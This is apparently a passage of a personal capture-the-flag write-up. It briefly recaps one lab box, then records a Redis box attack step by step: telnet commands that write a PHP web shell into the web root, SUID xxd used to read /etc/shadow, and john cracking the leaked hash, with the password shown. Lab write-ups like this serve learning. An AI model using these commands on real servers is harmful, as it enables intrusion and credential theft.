watcher, it was okay but nothing to write about. We had LFI to get FTP creds, upload a PHP reverse shell using the FTP account then include it for RCE, then a few different things to move between users but nothing exciting. Res
Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!
This was a
redis box, pretty simple. I mostly want to record the RCE step, which wasn’t guided. I followed this like so, with telnet:
└─# telnet 10.10.1.20 6379
Connected to 10.10.1.20.
Escape character is '^]' .
config set dir /var/www/html
config set dbfilename cmd.php
set test "<?php system( $_GET ['cmd']);?>"
Using the python reverse shell. Privesc was via the SUID bit on XXD to read /etc/shadow and break a password for our user from the sudoers group:
$ LFILE =/etc/shadow
www-data@ubuntu:/dev/shm $ xxd " $LFILE " | xxd -r
xxd " $LFILE " | xxd -r
vianka: $6$2p.tSTds $qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
Which then was:
└─# john hash -w =/usr/share/wordlists/rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt (3 ) $6$ [SHA512 256/256 AVX2 4x] )
Cost 1 (iteration count ) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beautiful1 (? )
1g 0:00:00:00 DONE (2021-02-19 03:58 ) 1.754g/s 2245p/s 2245c/s 2245C/s kucing..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Anyway the redis part was relevant.